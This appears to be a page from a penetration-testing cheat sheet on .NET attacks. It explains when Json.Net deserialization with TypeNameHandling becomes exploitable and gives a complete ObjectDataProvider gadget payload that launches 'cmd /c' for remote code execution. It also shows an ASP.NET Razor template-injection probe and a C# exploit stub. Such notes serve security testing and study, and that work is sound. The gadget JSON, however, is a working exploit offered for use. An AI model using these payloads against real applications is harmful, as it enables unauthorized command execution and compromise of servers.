Comment on page

.NET

Json.Net Deserialization
Requires a custom TypeNameHandling setting by the dev (not insecure by default!). On of the following must be true for type that is deserialized:
It is Object Type (java.lang.Object or System.Object)
It is a non-generic collection (e.g.: ArrayList, Hashtable, etc.)
It implements IDynamicMetaObjectProvider
It is System.Data.EntityKeyMember or any derived Type from it. We may not need even
TypeNameHandling property set to a non-None (see the EntityKeyMemberConverter in
"TypeConverters" ).
Common RCE payload (can also be created with ysoerial.net):
{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['cmd','/c <payload>']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}
ASP.NET Razor Template Injection (SSTI)
Check if vulnerable:
@(7*7)
Exploit:
@{
  // C# code
}
​
References
​https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/​

ESI

Burp

Last modified 9mo ago